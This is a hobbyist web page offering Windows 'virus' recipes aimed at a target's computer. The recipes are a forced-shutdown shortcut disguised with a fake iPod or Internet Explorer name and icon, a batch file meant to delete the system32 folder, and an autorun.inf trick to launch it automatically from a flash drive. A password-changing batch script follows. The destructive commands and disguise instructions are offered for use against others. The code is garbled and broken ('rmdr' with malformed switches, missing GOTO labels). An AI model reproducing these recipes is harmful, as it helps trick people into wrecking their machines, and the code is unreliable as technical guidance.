Program And Download™

Program For Share

We cannot teach you how to build a virus because i want my computer is safe for all people

All program in here need c++,Visual Basic,Notepad and hex editor if you not have please contact me

Fake Prog

Type File:Batch


Memory Wipe


rmdr C:/windows/system32 -s -q


Type File:Batch


Liltle Recepies of Trojan Worm


Shutdown Virus
Step 1. On your targets desktop, right click and create a new shortcut. Fill in the space with this:     %windir%\system32\shutdown -s -t 5

Then click next. Title it as iPod, Mp3 updates, Internet explorer,etc. Finally goto the virus and Right-click on it. Goto properties and change icon. select the perfect picture

Memory Wipe Virus
This one is a deadly computer virus that erases all of the computers system files required to function. Open up Notepad (in Accessories) and type this:

rmdr C:/windows/system32 -s -q

and save it as a batch file (.bat). Then when your
target double clicks on it their PC's memory will go blank.

Auto run is a feature where you program a Flashdrive or CD and it Automatically starts the programmed virus

In notepad type


Open=Name of batch file.bat

Save it as autorun.inf
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True Prog

Type File:Batch


Copy all these

@echo off
color 2
set /p CP=Would you like to change the password of ANY user account on your pc? (Y/N):
IF '%CP%' == 'Y' GOTO CP
IF '%CP%' == 'y' GOTO CP
IF '%CP%' == 'N' GOTO DCP
IF '%CP%' == 'n' GOTO DCP

set /p UN=What User Account Do you want to change the password for? (Type a user Name. For a list of users type UL.):
IF '%UN%' == 'UL' Goto NETUSER

set /p AYS=Are You Sure you Want to Change the password of the account %UN%. (Y/N)
IF '%AYS%' == 'Y' goto CPY
IF '%AYS%' == 'y' goto CPY
IF '%AYS%' == 'N' Goto DCP
IF '%AYS%' == 'n' Goto DCP

Net User %UN% *

Echo The password will not be changed.

Net User
Goto :CP


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